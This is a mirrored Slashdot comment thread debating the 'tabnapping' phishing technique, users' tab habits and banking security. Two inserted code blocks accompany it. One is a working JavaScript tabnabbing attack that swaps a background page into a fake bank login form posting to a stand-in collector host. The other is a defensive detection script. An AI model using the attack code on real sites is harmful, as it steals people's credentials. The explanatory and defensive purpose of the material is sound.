Slashdot Mirror


Tabnapping Scams Around the Corner?

scamdetect pointed us to an interesting bit of news about a new security risk called tabnapping that was recently outlined by Aza Raskin. The short story is that background tabs are updated with login forms impersonating the sites they originally contained, but hosted by helpful third parties primarily interested in your password. (CT: Original writeup removed at request of submitter)

362 comments

  1. Umm... by Pojut · · Score: 3, Insightful

    ...so are people really dumb enough to go "oh right, my bank's webpage" without realizing they didn't bring it up themselves?

    1. Re:Umm... by Anonymous Coward · · Score: 1, Insightful

      Yes.

      Did you really need to ask?

    2. Re:Umm... by mgblst · · Score: 5, Insightful

      What if they have it in another tab already? Then it would work.

      And if you use this for gmail, or facebook, tabs that people always have opened, it is going to get results.

      This is actually incredibly brilliant. I am going to pay more attention to my tabs from now on.

    3. Re:Umm... by Pojut · · Score: 0, Flamebait

      It was a rhetorical question, clod!

    4. Re:Umm... by Anonymous Coward · · Score: 3, Insightful

      I think what might be more disturbing is if the application looked at what url your other tabs are and redirected those sites to phishing sites that have copied the layout.

    5. Re:Umm... by commodore64_love · · Score: 2, Insightful

      Well for example I'm logged into facebook right now. As I'm jumping from site-to-site in Tab #2, one of them could hijack the Tab #1 and make it look like a legitimate facebook login screen. And I would probably fall for it when, in about an hour, I go back to see it. I'd type in my name and password without realizing a thief was watching.

      --
      "I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
    6. Re:Umm... by fuzzyfuzzyfungus · · Score: 3, Interesting

      P.T. Barnum, expert applied scamologist, is said to have observed that you can "fool some of the people all of the time and all of the people some of the time."

      Arguably, that will be the case here. Your basic clueless noobtard will click on just about anything that looks vaguely plausible, and a lot of stuff that doesn't. This technique will be overkill for them, since straight phishing still works just fine.

      Your competent power user, on the other hand, may not fall for the trivial cases (two or three tabs, "innocuous-linkfarm.typosquatter.com" changes into "evil.ath.cx/yourbankherereallyhonestly.html" in front of your eyes); but they are the ones most likely to have 10 firefox windows open, each with 20 or 30 tabs, possibly on multiple monitors. Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19. That'd be a totally understandable mistake, some percentage of the time, especially if you were tired, distracted, multitasking, or getting sauced enough to face a legacy refactoring project.

      Again, tab-related trickery is of no particular use against SSL and cert validation, so the clueful user could detect it that way(unless combined with some attack on SSL, the browser's implementation of it, or the integrity of a trusted certificate authority); but there is no particular reason to suspect that any but the most paranoid user would detect the tab-substitution attack itself.

    7. Re:Umm... by AlexiaDeath · · Score: 1

      People are dumb enough to install Latest Awesome Bling MSN smileypack + FREE TROJANS, they are dumb enough to fall for this. Banks around here do recommend opening a NEW browser window for banking and closing it when done, though, as a dumb-user safeguard. But they also implement a proper 2-factor (what you know + what you have, a smart card with PIN needed to use certificates) authentication system. The legacy 1.5-factor system is severely limited already (the sum you can move is ridiculously small) and will be phased out completely soon. This or better is what the world of banking should do everywhere.

    8. Re:Umm... by Pojut · · Score: 1

      Well for example I'm logged into facebook right now. As I'm jumping from site-to-site in Tab #2, one of them could hijack the Tab #1 and make it look like a legitimate facebook login screen

      Ah, but like you said, you are logged into Facebook right now. Would you not find it suspicious if when you clicked back over to it, you were greeted with a login screen?

    9. Re:Umm... by Taibhsear · · Score: 1

      ...so are people really dumb enough to go "oh right, my bank's webpage" without realizing they didn't bring it up themselves?

      Having cleaned malware from at least a dozen computers/hard drives in the last couple months alone... Yes.

    10. Re:Umm... by PopeRatzo · · Score: 1

      As long as they leave my Quick Launch bar alone.

      --
      You are welcome on my lawn.
    11. Re:Umm... by Anonymous Coward · · Score: 0

      Wasn't it Abraham Lincoln that said that?

    12. Re:Umm... by sglane81 · · Score: 1

      This does not prey on smart or dumb. This preys on how much information you can hold in your head at the same time. Miller's magic number 7. When you go beyond 7 things, you'll have to access different memory which is where the sleight of hand is at play.

      http://en.wikipedia.org/wiki/The_Magical_Number_Seven,_Plus_or_Minus_Two

      --
      This is the Internet. You can say "fuck" here. - AC
    13. Re:Umm... by Anonymous Coward · · Score: 0

      What if they have it in another tab already? Then it would work.

      And if you use this for Slashdot, or Youporn, tabs that people always have opened, it is going to get results.

      This is actually incredibly brilliant. I am going to pay more attention to my tabs from now on.

      Fixed for target audience.

    14. Re:Umm... by Anonymous Coward · · Score: 0

      but there is no particular reason to suspect that any but the most paranoid user would detect the tab-substitution attack itself.

      Or anyone who doesn't leave login pages open. Generally, if I have a tab open, it's because it's on a page with some actual content that I will want to go back to at a later time. If I log into something that might time me out eventually, such as my bank, then I just log in, do what I need to do, log out, and close the tab.

      Also, even if I did have 10 Firefox windows open with 20 or 30 tabs in each, when it's time to log into my bank, I'm not going to flip through all 200 to 300 tabs to see if there happens to be one sitting on the bank login page, I'm just going to open a new tab and go directly to it.

      I'm not saying that people won't fall for this. I'm just saying you don't have to be "the most paranoid user" to detect, or at least avoid, tab substitution.

    15. Re:Umm... by KiloByte · · Score: 1

      tab-related trickery is of no particular use against SSL and cert validation,

      And how exactly would SSL help in this case? The phisher will have a legitimate cert for *.scam.com, you're not going to catch it unless you notice the URL is wrong or you run Certificate Patrol.

      --
      The creatures outside looked from Alt-Right to Antifa; but already it was impossible to say which was which.
    16. Re:Umm... by Anonymous Coward · · Score: 0

      What kind of power user accepts a bank that uses only a username + password for the management of their money?

    17. Re:Umm... by fuzzyfuzzyfungus · · Score: 1

      Depending on the market they happen to live in, any power user who wants a bank...

    18. Re:Umm... by KiloByte · · Score: 1

      The phisher will just proxy your session to the real bank. Except, when you make that transfer, oops!, it will go to a different account. All while displaying the account you wanted on your screen.

      --
      The creatures outside looked from Alt-Right to Antifa; but already it was impossible to say which was which.
    19. Re:Umm... by morgan_greywolf · · Score: 1

      As long as they leave my Quick Launch bar alone

      The Quick Launch bar in Windows is one of the easiest things to modify programmatically. Very easy to do with a bit of VBScript code, PowerShell code, or perhaps something like a NullSoft installer.

    20. Re:Umm... by erroneus · · Score: 1

      Actually, in theory, they already had their bank web page up and when they weren't looking, some other code/app changes that page to a phishing page that looks like the bank's site except that it says "session timed out, please log in again." At which point, the user provides his username and password to restore his session.

      Not only do I see the average Joe falling for this sort of attack, I see *ME* falling for such an attack. I use uncommon financial and insurance companies and I have never seen a phishing email come to me pretending to be one of those... well until recently anyway. I did get one from my fairly exclusive insurance company and was pretty impressed with some levels of its sophistication. I didn't fall for it, but if it appeared in one of my tabs replacing a legitimate session, I would certainly have been fooled.

      Two things should be done to prevent this:

      1. Browsers must be coded to prevent this sort of cross-tab manipulation.
      2. All providers of sensitive information should use a key-fob type security device where the password is changed every minute or so. In this case, if the login credentials were compromised, it would quite likely be changed before anything bad could happen.

      This second option should be requested by the users. With enough requests, the institutions are bound to respond eventually. Many banks do this already with larger commercial customers, leaving their private individual customers more open to exploitation. It's time I got my own SecurID-type device, I think.

    21. Re:Umm... by dtml-try+MyNick · · Score: 1

      ...so are people really dumb enough to go "oh right, my bank's webpage" without realizing they didn't bring it up themselves?

      Short answer, yes! Long answer, yes!

      It's not even about being stupid or being dumb, but the majority of people are simply clueless. It's their computer and that's safe by definition. They can't imagine that anything they see in their browser (or other program) they started up themselves could be malicious.

      They had to be taught not to click on links in their mail, and you expect that very same group to know that a website can be evil too, even if it looks exactly, pixel-perfect, the same as the website they usually visit.
      Not going to happen.

      There are 2 kinds of people in this world: those who are stupid and/or gullible, and those who take advantage of that.

      --
      Life starts at the end of your comfort zone.
    22. Re:Umm... by morgan_greywolf · · Score: 1

      This does not prey on smart or dumb. This preys on how much information you can hold in your head at the same time. Miller's magic number 7. When you go beyond 7 things, you'll have to access different memory which is where the sleight of hand is at play.

      Which is exactly why the parent pointed out that best practice for going to your bank is still to open a new browser window with no other tabs every time and closing it as soon as you're done.

      It seems dumb to me not to do so.

    23. Re:Umm... by mcgrew · · Score: 3, Informative

      P.T. Barnum, expert applied scamologist, is said to have observed that you can "fool some of the people all of the time and all of the people some of the time."

      No, that was Abraham Lincoln, who said "you can fool some of the people all of the time, and all of the people some of the time, but you can't fool all of the people all of the time."

      PT Barnum said "there's a sucker born every minute." And both he and Lincoln were correct.

    24. Re:Umm... by SatanicPuppy · · Score: 1

      Actually, wrt to banking transactions, I'm cautious enough due to cross-site scripting vulnerabilities that I won't open a bank session when I have any other tabs open.

      --
      ad logicam Claiming a proposition is false because it was presented as the conclusion of a fallacious argument.
    25. Re:Umm... by commodore64_love · · Score: 1

      >>>most likely to have 10 firefox windows open, each with 20 or 30 tabs, possibly on multiple monitors. Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19. That'd be totally understandable mistake

      I don't understand power users like that. Do you REALLY need to have ~50 different websites open? First off, my machine wouldn't even support it (just 1/2 gig of RAM), and second it's confusing. When I hit over 10 tabs, I start bookmarking and then closing the ones I don't really need. I can come back to them later.

      --
      "I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
    26. Re:Umm... by Pojut · · Score: 1

      ^This. My bank asks for the standard username and password, but then on the next screen they request your PIN. You don't type it in, though...it's completely mouse driven. So not only do they have the extra protection of needing a PIN, but it helps thwart keyloggers because you don't actually type it in.

    27. Re:Umm... by Anonymous Coward · · Score: 0

      I maintain 40 tabs open on my home page but the tabs are preset and each tab appears in specific location when I open my work session for the day. The slashdot page goes in one specific tab, the gmail in another, etc. Whenever I start a new project or investigation during the day I always open it up in a new window and once I am finished I close the window.

      I would notice immediately if a tab on my home page was open where it shouldn't be.

      Therefore I think I am immune to this type of phishing.

    28. Re:Umm... by delinear · · Score: 1

      As far as I can tell that's exactly what the author is getting at, it's just badly summed up by saying they leave the page. What it means is, you open Facebook or something in one tab, in another tab you go to a site which has an embedded attack that reloads the Facebook tab with a phishing site that looks the same but has some "timeout, please login again" message. To the user it doesn't appear that they left the FB site at all, and likely when they "log in" the phishing site will collect their details and redirect the tab to the original page so unless the user is paying particular attention to the URLs it's completely transparent. I don't know what the feasibility of the attack is, but if it's valid you certainly wouldn't have to be stupid to fall for it.

    29. Re:Umm... by delinear · · Score: 1

      Facebook is just a convenient example people have heard of. There are other sites where such an attack could do a lot more damage and which the user would expect to be periodically logged out of - banking for example, although if you leave a banking session open and logged in while you're working in other tabs you're probably asking for trouble anyway, but that doesn't mean it never happens.

    30. Re:Umm... by Anonymous Coward · · Score: 0

      My brother's name is Claude, you insensitive clod!

    31. Re:Umm... by TheRaven64 · · Score: 1

      are people really dumb enough to

      For any way that you can finish that sentence, the answer is always 'some people are, yes'. The question is how many people are dumb enough. If the end result is someone else having access to your bank account, then even a few people can make it worthwhile.

      --
      I am TheRaven on Soylent News
    32. Re:Umm... by John+Hasler · · Score: 1

      > There are 2 kinds of people on this world, those who are stupid and/or
      > gullible and those who take advantage of that.

      So which are you: a fool or a criminal?

      --
      Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
    33. Re:Umm... by TheLink · · Score: 1

      Use different browsers for your banking?

      I've got one browser for my banking, running as a different user, and it makes the "click noise" when I click on stuff (unlike my other browsers) - this browser has javascript etc disabled for everything else except the bank sites.

      I've got another browser for "normal stuff" running as a different user.

      FWIW, chrome doesn't allow me to run it as a different user on Windows.

      On the subject of tabnapping - one problem with chrome and the latest firefox is they make it hard to figure out where the latest "new tab" will be. No, it is not strictly adjacent to the source tab. Where the new tab is placed depends on a number of things (whether you've opened other new tabs from the source tab, or whether you've just created a new blank tab) and is rather hard to predict unless you remember the browser state. This does make it easier to fool people with tabnapped tabs.

    34. Re:Umm... by Qzukk · · Score: 1

      I'm not sure how you'd go about changing another tab (unless there's a bug). What I think is more likely is that someone who has 20+ tabs open isn't going to remember which of those tabs was the one they logged into facebook on, so when they come across a tab that says "timed out, please log in again" they're going to assume that one was correct.

      Doesn't help that by default, tabbed browsers show [ F... ] when you've got more than three or four tabs across the top of the screen. Not that [Face...] down the side is a whole lot better...

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
    35. Re:Umm... by delinear · · Score: 2, Interesting

      I bank with HSBC, which is by no means a little no-name bank, and they let me log in with just typed credentials (account details and three digits of a 6-9 digit pin). I wish they'd back this up with some kind of dongle authentication, like other banks, but their answer is to have me install some rubbish plugin if I want added security, which I can't always do if I'm using different machines, working off site, etc. so I have little choice (other than the hassle of changing banks) than to accept their requirements. I have taken to using the on-screen keyboard so that I can enter with mouseclicks rather than keypresses if I'm on an untrusted machine, but other than that I can't do much else.

      It seems to me that online security is being loosened rather than tightened, in the name of providing more freedom to users (in other words just not making them jump through a couple more hoops to protect their life savings) - simple text entry, banking on mobile phones, isn't all this just asking for trouble? Ten years ago I could create one-time debit/credit card accounts with a fixed maximum or that expired after X payments or that could only be charged by client Y, etc and yet I have a hard time finding any of that from the major banks today.

    36. Re:Umm... by natbudin · · Score: 1

      Cory Doctorow had an essay that speaks to this point recently: http://www.locusmag.com/Perspectives/2010/05/cory-doctorow-persistence-pays-parasites/

      TL;DR: Even if you're clueful and security-conscious most of the time, all it takes is one momentary mistake, and nobody can be perfect. Phishers and scam artists know this, and attack constantly and without cease, so that even though they fail 99.9999% of the time, those few successes yield great returns.

    37. Re:Umm... by causality · · Score: 1

      Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19.

      I had no idea that glancing up at the address bar to check the domain of the URL immediately before actually typing login credentials qualified as "an inhuman ability to maintain state tables in your head." Is this sort of like the way janitors are called "sanitation engineers"?

      --
      It is a miracle that curiosity survives formal education. - Einstein
    38. Re:Umm... by marcosdumay · · Score: 1

      Well, SSL is useless if you don't check the URL. This attack doesn't change that.

      I guess most experienced users (the ones that have several tabs open) already know that. If not, it's time for education. I guess they also check the URL of their bank before entering passwords.

    39. Re:Umm... by Anonymous Coward · · Score: 0

      or getting sauced enough to face a legacy refactoring project.

      ...cries in the corner...

    40. Re:Umm... by delinear · · Score: 1

      I tend to have to switch between, on average, four or five projects per day. Of those projects, each one has a local development environment, a system test, sometimes pre-production and a live production environment. If I'm viewing the differences between a single page on just two of the three or four environments, I already have ten tabs open - then there's webmail, issue tracking, online analytics and time management apps open in other tabs (and there'll usually be three or four issue tracking tabs open because, as I mentioned, usually switching between projects). I'm already at 15 - 20 tabs on an average day where I'm working on small, isolated projects (if anything I'm changing on any of those five projects has a site-wide impact, I'll of course have a bunch of windows open for that project so I can visually check nothing's screwed up, and this scenario is more usual for me than the one where what I'm changing affects only one page) - add in forums and information sites if I'm reading about particular technologies or tracking down bugs etc and on any given day it's not unusual for me to have 30-40 tabs open, it's just not worth the overhead of having to shut down, re-open and reload all those URLs as and when I need them. I already have several hundred bookmarks, so I don't want to pollute that pool even more with sites I might only need to use for a week and then never visit again.

    41. Re:Umm... by ottothecow · · Score: 1
      My gmail tab did just this right before I read this article.

      I noticed the tab no longer had the "Inbox (###)" text and instead just said "GMail" as I had timed out or something.

      I'd be worried...but it was actually google's page and this happens every few days so I am used to it. Would I have checked the address bar and noticed if this had actually been a tabnapping attack? Probably not.

      --
      Bottles.
    42. Re:Umm... by causality · · Score: 1

      It's not even about being stupid or being dumb but the majority of people is simply clueless.

      In isolation, not knowing any better is not stupidity; it is ignorance. Being clueless about a device or system and deciding that you're going to use it for important financial transactions anyway is the stupid part. It's a bit like getting in a car and going to the busiest, highest-speed freeway when you have no knowledge of how to drive. Not knowing how to drive doesn't make someone stupid; it means they just haven't been taught. Not knowing how to drive and doing it anyway in one of the more demanding driving environments makes someone stupid. See the difference?

      That's probably one of the more practical definitions of stupidity: not knowing your own limitations when you are about to exceed them, or knowing them and refusing to address them when there is a manifest need to do so.

      It's their computer and that's safe by definition. They can't imagine that anything they see in their browser (or other program) they started up themselves could be malicious.

      It may be their computer but it isn't their remote web site.

      There are 2 kinds of people on this world, those who are stupid and/or gullible and those who take advantage of that.

      Third option: there are those who want to make an honest living while at the same time learning as much as possible from the mistakes, idiocy, and bad examples of those around them. I didn't ask a fool to be easily parted from his money, but now that he has done so of his own initiative, I can read about it and understand why he was acting foolishly to make myself much less likely to follow his example.

      --
      It is a miracle that curiosity survives formal education. - Einstein
    43. Re:Umm... by del_diablo · · Score: 1

      2 problems:
      How would the phisher know that the user actually changed tab? Random timeout then forced reload?
      Being somebody who has 20-30 tabs up and running along with massive tab switching, I can't see how I would not spot that it's forcibly reloaded and wrong?

    44. Re:Umm... by noidentity · · Score: 1

      This is actually incredibly brilliant. I am going to pay more attention to my tabs from now on.

      Agreed, but I prefer spaces, since people expand tabs to varying number of spaces, most commonly 2, 3, 4, or 8.

    45. Re:Umm... by Call+Me+Black+Cloud · · Score: 1

      I agree...I'm impressed with the cleverness. Clearly all the advancements in browser security and user safety are forcing the bad guys to be smarter, sort of an Internet version of antibiotic resistant staph.

    46. Re:Umm... by Dumnezeu · · Score: 1

      And Google has been logging me out lately for absolutely no reason! In the past year, I've been "kicked" out of my session at least once a month, sometimes even two-three times in a single day. I'm already used to being asked to type all my passwords to iGoogle, Google Reader, Gmail, YouTube. I would NEVER think that a tab should have the right to take over another tab. Whatever the excuse is, this is just wrong!

      --
      Yes, it's sarcasm. Deal with it!
    47. Re:Umm... by Qzukk · · Score: 1

      you are logged into Facebook right now. Would you not find it suspicious if when you clicked back over to it, you were greeted with a login screen?

      Only if you knew Facebook never timed you out if you left it alone like just about every other website out there. Try substituting it with a bank login screen.

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
    48. Re:Umm... by nabsltd · · Score: 2, Informative

      PT Barnum said "there's a sucker born every minute."

      No, he didn't.

    49. Re:Umm... by Anonymous Coward · · Score: 0

      I'm using Iron 3, which is based on Chrome 3, and it is vulnerable, and were it not for the fact that it gets the favicon wrong, I would have totally fallen for it. It is also vulnerable to the history snooping attack on the same site. Scary. It's almost like browser developers don't keep security in mind at all when they're coding. I mean... window.onblur? WTF? What kind of moron do you have to be to code support for that?
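
The question in comment 43 (how does the phisher know you switched tabs?) and the window.onblur remark in comment 49 are two halves of the same mechanism. What follows is an added example, not code from the original page or from Aza Raskin's demo: a model of the self-rewriting page the thread describes. Nothing reaches into other tabs; the page you already have open simply notices it is out of sight (window blur/focus in 2010, the Page Visibility API today), waits, and then rewrites its own title, favicon and body into a "session timed out" form. The 60 s idle threshold, the "examplebank.test" target and the "collector.example" credential sink are constructed assumptions, not anything from the page.

```javascript
// Added example, not code from the original page or from Aza Raskin's demo.
// Models a page that rewrites ITSELF once its tab has been out of sight for a
// while. Assumed (not from the page): the 60 s threshold, the constructed
// "examplebank.test" target and the "collector.example" credential sink.

const HIDDEN_THRESHOLD_MS = 60 * 1000; // assumption: swap after a minute unseen

// Pure state machine so the timing can be exercised without a browser.
// Feed it visibility events with timestamps; tick() says whether to swap.
class TabnabPlan {
  constructor(thresholdMs = HIDDEN_THRESHOLD_MS) {
    this.thresholdMs = thresholdMs;
    this.hiddenSince = null; // when the tab went out of sight, or null
    this.swapped = false;    // the swap happens at most once
  }
  onHidden(now) {
    if (this.hiddenSince === null) this.hiddenSince = now;
  }
  onVisible() {
    // User came back early: abort, a page changing under their eyes is noticed.
    this.hiddenSince = null;
  }
  tick(now) {
    if (this.swapped || this.hiddenSince === null) return "wait";
    if (now - this.hiddenSince < this.thresholdMs) return "wait";
    this.swapped = true;
    return "swap";
  }
}

// The decoy: the impersonated site's title and favicon, plus a "timed out"
// login form whose action posts to the attacker, not to the bank.
function buildDecoy(target) {
  return {
    title: target.title,
    favicon: target.favicon,
    html:
      `<form action="${target.collector}" method="post">` +
      `<p>Your session has timed out. Please log in again.</p>` +
      `<input name="user" placeholder="Username">` +
      `<input name="pass" type="password" placeholder="Password">` +
      `<button type="submit">Log in</button></form>`,
  };
}

// Apply the decoy to a document-like object. Only the page's own document is
// touched; the address bar still shows the attacker's URL, which is the tell.
function applyDecoy(doc, decoy) {
  doc.title = decoy.title;
  let link = doc.querySelector('link[rel~="icon"]');
  if (!link) {
    link = doc.createElement("link");
    link.rel = "icon";
    doc.head.appendChild(link);
  }
  link.href = decoy.favicon; // comment 49: a browser that ignores this is what gave it away
  doc.body.innerHTML = decoy.html;
}

// Browser binding: blur/focus on window plus visibilitychange on document.
// Returns the interval id so a demo page can clearInterval() it.
function arm(plan, target, win, doc) {
  const hidden = () => plan.onHidden(Date.now());
  const visible = () => plan.onVisible();
  win.addEventListener("blur", hidden);
  win.addEventListener("focus", visible);
  doc.addEventListener("visibilitychange", () => (doc.hidden ? hidden() : visible()));
  return win.setInterval(() => {
    if (plan.tick(Date.now()) === "swap") applyDecoy(doc, buildDecoy(target));
  }, 1000);
}

// Only wire up the DOM inside a browser; under node the pure parts still run.
if (typeof window !== "undefined" && typeof document !== "undefined") {
  arm(new TabnabPlan(), {
    title: "Example Bank - Sign in",                  // constructed target
    favicon: "https://examplebank.test/favicon.ico", // constructed
    collector: "https://collector.example/submit",   // constructed
  }, window, document);
}
```

Drop the block into a page you control and switch away from its tab for a minute to see the swap; the state machine and the decoy builder can be checked in node without a DOM. Note what the model does not do: it never reads or writes another tab, so "browsers allow scripts to access other tabs" is not the bug here. The only thing the browser hands the attacker is the fact that the tab lost focus.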

    50. Re:Umm... by GlennC · · Score: 1

      I guess they also check the URL of their bank before entering passwords.

      Guess again.

      --
      Go on, citizen, stamp the vote card. R or D, your choice.
    51. Re:Umm... by nabsltd · · Score: 1

      I don't understand power users like that. Do you REALLY need to have ~50 different websites open?

      If you have just one website with links that don't deal well with the "back" button, then you end up opening multiple tabs on the same site.

      I use a web app that fronts a pretty complex relational database, and it's not unusual that I want to switch between several related query results (e.g., the account details like address and phone, the last few orders, and maybe order details on some of those orders) very quickly.

      With 25Mbps download, when I'm price comparing, it's easier to use Google Shopping and open a tab for 5-6 of the "best" results and check out if they really do have the price that Google Shopping showed me in the list (i.e., not out of stock, shipping the same, etc.).

      I'm not a "50 tab" guy, but 15-20 isn't unusual.

    52. Re:Umm... by Anonymous Coward · · Score: 0

      Your competent power user, on the other hand, may not fall for the trivial cases(two or three tabs, "innocuous-linkfarm.typosquatter.com" changes into "evil.ath.cx/yourbankherereallyhonestly.html" in front of your eyes); but they are the ones most likely to have 10 firefox windows open, each with 20 or 30 tabs, possibly on multiple monitors. Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19. That'd be totally understandable mistake, some percentage of the time, especially if you were tired, distracted, multitasking, or getting sauced enough to face a legacy refactoring project.

      I don't consider anyone using the same browser for "funny stuff" and "important stuff" a "competent power user".

      I don't even consider myself a poweruser. But I have usually only two Firefox windows open, albeit one with usually 50+ tabs. But I also have at least one other totally different browser (Opera, Links2, Dillo and Elinks provide better security than Firefox) open with all the "important" stuff. I don't like to do casual browsing on the same browser I use for matters of importance, sometimes I have to because web developers are incompetent bastards that only make pages that work with Firefox (and Internet Explorer), but when I have to do "important stuff" in Firefox, I close all other tabs before I do.

    53. Re:Umm... by Hurricane78 · · Score: 1

      Simply make sure that you only have one tab open that you created in an empty session. TabMix Plus’s advanced session manager can make that very easy, even if you have lots of tabs open that you want to keep. (And that should be a bookmarks folder instead! Instead of a tab mess.)

      --
      Any sufficiently advanced intelligence is indistinguishable from stupidity.
    54. Re:Umm... by Anonymous Coward · · Score: 0

      "This is actually incredibly brilliant."

      Not really. This is really someone taking advantage of the stupidity of the default behavior, and I'm not sure how that default behavior became acceptable by browsers in the first place.

      I'm more stunned that browsers allow scripts to access other tabs or windows within the browser. And someone is saying they have access to the browsers history? Are you kidding me? WTF?

      Worse, why is a browser so stupid that it allows a redirection or load from a different domain than the one typed in anyways? Why is http redirection on by default, and why is script redirection and loads (the browser knows it's loading, since it's updated the browser tab/window) not controllable? I'm getting sick of browsers allowing the *default* behavior to allow every damn script, and going through the preferences it's unclear what is actually being allowed or if it even works when you turn the preference off anyways.

      The browser needs to ship to be immune from the start, so that if it loads the most hack-infested site, nothing happens. Not that if I type in the wrong URL by one letter, and go to some porn site instead of the computer tech site I wanted, I get owned by some advertisement or background script.

      I'm starting to think we need an OpenBSD for browsers. In the meantime, I'm going to revisit my preferences in my browsers, AGAIN.
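
Since the page rewrites itself rather than reaching into other tabs, there is no cross-tab access for a browser preference to turn off; what a user-side guard can do is notice the symptoms. The following is an added example, not code from the original page: the logic of a userscript or extension content script that snapshots what a person uses to recognise a tab (origin, title, favicon, whether a password field is present) when the tab goes out of sight, and compares on return. The sample snapshots are constructed for illustration.

```javascript
// Added example, not code from the original page: a user-side tabnabbing
// guard. It cannot stop a page from rewriting itself, but it can flag the
// symptoms when the tab comes back into view. The snapshots used in the test
// are constructed; no real sites are involved.

// Pure comparison of two plain snapshots; returns the indicators found.
function tabnabIndicators(before, after) {
  const found = [];
  // The classic swap keeps the same origin (the page only rewrote itself),
  // so an unchanged origin proves nothing; a changed one means a navigation.
  if (before.origin !== after.origin) found.push("origin changed while hidden");
  if (before.title !== after.title) found.push("title changed while hidden");
  if (before.favicon !== after.favicon) found.push("favicon changed while hidden");
  if (!before.hasPasswordField && after.hasPasswordField) {
    found.push("password field appeared while hidden");
  }
  return found;
}

// Verdict: a password field that appeared together with a changed identity is
// the tabnabbing pattern ("warn"); a lone title change is usually an unread
// count or similar ("notice"); nothing changed is "ok".
function assess(before, after) {
  const indicators = tabnabIndicators(before, after);
  const passwordAppeared = indicators.some((s) => s.startsWith("password"));
  const identityChanged = indicators.some((s) => !s.startsWith("password"));
  let verdict = "ok";
  if (passwordAppeared && identityChanged) verdict = "warn";
  else if (indicators.length > 0) verdict = "notice";
  const message =
    verdict === "ok"
      ? "no change while hidden"
      : `${after.origin}: ${indicators.join("; ")}` +
        (verdict === "warn" ? ". Check the address bar before typing a password." : "");
  return { indicators, verdict, message };
}

// Snapshot of a document-like object plus a location-like object.
function snapshot(doc, loc) {
  const icon = doc.querySelector('link[rel~="icon"]');
  return {
    origin: loc.origin,
    title: doc.title,
    favicon: icon ? icon.href : "",
    hasPasswordField: doc.querySelector('input[type="password"]') !== null,
  };
}

// Browser binding: snapshot on hide, compare on show. Skipped under node.
if (typeof document !== "undefined" && typeof location !== "undefined") {
  let before = null;
  document.addEventListener("visibilitychange", () => {
    if (document.hidden) {
      before = snapshot(document, location);
      return;
    }
    if (before === null) return;
    const result = assess(before, snapshot(document, location));
    if (result.verdict !== "ok") console.warn(`[tabnab-guard] ${result.message}`);
  });
}
```

Expect false positives: a real site whose session expires while you are away (the Gmail case in comment 41) produces the same "title changed, password field appeared" signature as the decoy, because from the user's chair the two are indistinguishable by content alone. That is the point of the warning text: the only reliable discriminator is the address bar, so the guard nags you to look at it rather than trying to decide for you.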

    55. Re:Umm... by KevinKnSC · · Score: 1

      Sure, but by the time you've got users running scripts or installers locally you've already won. No need to also trick them into using a fake web page when you could just be logging their keys on the real page.

    56. Re:Umm... by Hurricane78 · · Score: 1

      but you can't fool all of the people all of the time

      Alone, this statement is bullshit, as it has no explaining basis attached. Let’s do that:
      You can not fool all the people all the time, as long as there are gray areas between 1 and 0 in neural networks in human brains, because they cause a Gaussian distribution curve. (In this case a series of them over time.) And as long as there is always a part of the curve that is far enough outside that the amount of being fooled is closer to zero.
      Experience suggests that this is nearly always the case, but can not rule out the unlikely exception.

      Especially since “all the time” does not mean “until the end of the universe“, but just enough to reach your goal.

      Additionally since minorities can be below the power to change things, despite not being fooled, this gives you a pretty good chance to fool enough people for a long enough time, to do what you want to do. By “skating” in the center of the “wave” (sequence of curves over time).

      Also it only requires one “sucker”, similar to how it only requires one cracker to make something (software, a protected room, etc) available to everybody.

      But luckily, you can also use fooling in the opposite (good) way, to counteract the fooling. The only problem is, that that only works if you got just as little scruple and can cheat and lie just as well (in the name of good). Which unfortunately is nearly never the case.

      There you have it: Do you have the scruple to ruin a pretty good chance to fool all the people all the time?

      --
      Any sufficiently advanced intelligence is indistinguishable from stupidity.
    57. Re:Umm... by Anonymous Coward · · Score: 0

      HSBC's *business* banking in the UK does have a hardware number generator dongle. I guess they're too big cheapskates to do it for personal accounts?

    58. Re:Umm... by kalirion · · Score: 1

      The scam is if you open your bank's web page yourself, and a script in another tab changes it to the phishing site.

    59. Re:Umm... by Anonymous Coward · · Score: 0

      PT Barnum never actually said that. It was who said that in response to something that PT Barnum did.

    60. Re:Umm... by twidarkling · · Score: 1

      Please never submit a manuscript to a publisher then. The poor sod in charge of cleaning up your manuscript will want to fucking murder you for using spaces instead of tabs. I know from personal experience: I've been the poor sod needing to clean it up.

      --
      Canada: The US's more awesome sibling.
    61. Re:Umm... by eugene+ts+wong · · Score: 1

      You are right. Many web sites use very cryptic URLs, so it's hard to check.

    62. Re:Umm... by Qzukk · · Score: 2, Interesting

      user actually changed tab?

      window.onblur()

      Being somebody who got 20-30 tabs up and running along with massive tab switching I can't see how I would not spot that it's forcefully reloaded and wrong?

      Do you know for certain, without looking, what is in tab #8 right this instant? If you had to look, then if you didn't read the exact URL you just lost. If you didn't have to look or you looked at the URL instead of just the title or the icon on the tab, then you would realize that tab #8 was wrong and you would be immune.

      I think the majority of people would fall for it, even if they only had three or four tabs open instead of 20-30.

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
    63. Re:Umm... by maroonhat · · Score: 1

      and if you couple this attack with the slightly older "make the address bar show a slightly wrong thing" attack...
      you know, the PayPal.com vs PayPaI.com (one's an L one's an I, can you tell with the default font?)...adjusted for font collisions, or making use of the way a browser falls back on installed fonts when you try and show a different script style...

      This could be very bad...

      --
      The more I learn about Windows the more I am surprised it runs at all
    64. Re:Umm... by Anonymous Coward · · Score: 0

      Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19.

